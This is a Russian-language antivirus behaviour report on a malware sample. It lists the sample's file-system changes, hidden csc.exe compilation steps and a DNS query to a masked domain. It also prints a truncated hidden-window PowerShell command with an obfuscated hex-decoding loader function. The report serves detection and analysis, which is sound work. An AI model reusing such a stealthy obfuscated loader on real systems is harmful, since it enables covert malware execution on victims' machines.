Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function w41fae {param($rf456f8)$j525a='m646df';$h3f758='';for ($i=0; $i -lt $rf456f8.length;$i+=2){$uf75f2=[convert]::ToByte($rf456f8.Substring($i,2),16);$h3f758+=[char](...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\3yxkbv3v.0.cs
- %TEMP%\3yxkbv3v.cmdline
- %TEMP%\3yxkbv3v.out
- %TEMP%\csc7e88.tmp
- %TEMP%\res7e99.tmp
- %TEMP%\3yxkbv3v.dll
Удаляет следующие файлы
- %TEMP%\res7e99.tmp
- %TEMP%\csc7e88.tmp
- %TEMP%\3yxkbv3v.out
- %TEMP%\3yxkbv3v.pdb
- %TEMP%\3yxkbv3v.dll
- %TEMP%\3yxkbv3v.cmdline
- %TEMP%\3yxkbv3v.0.cs
Сетевая активность
UDP
- DNS ASK ka###to.info
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3yxkbv3v.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7E99.tmp" "%TEMP%\CSC7E88.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3yxkbv3v.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7E99.tmp" "%TEMP%\CSC7E88.tmp"
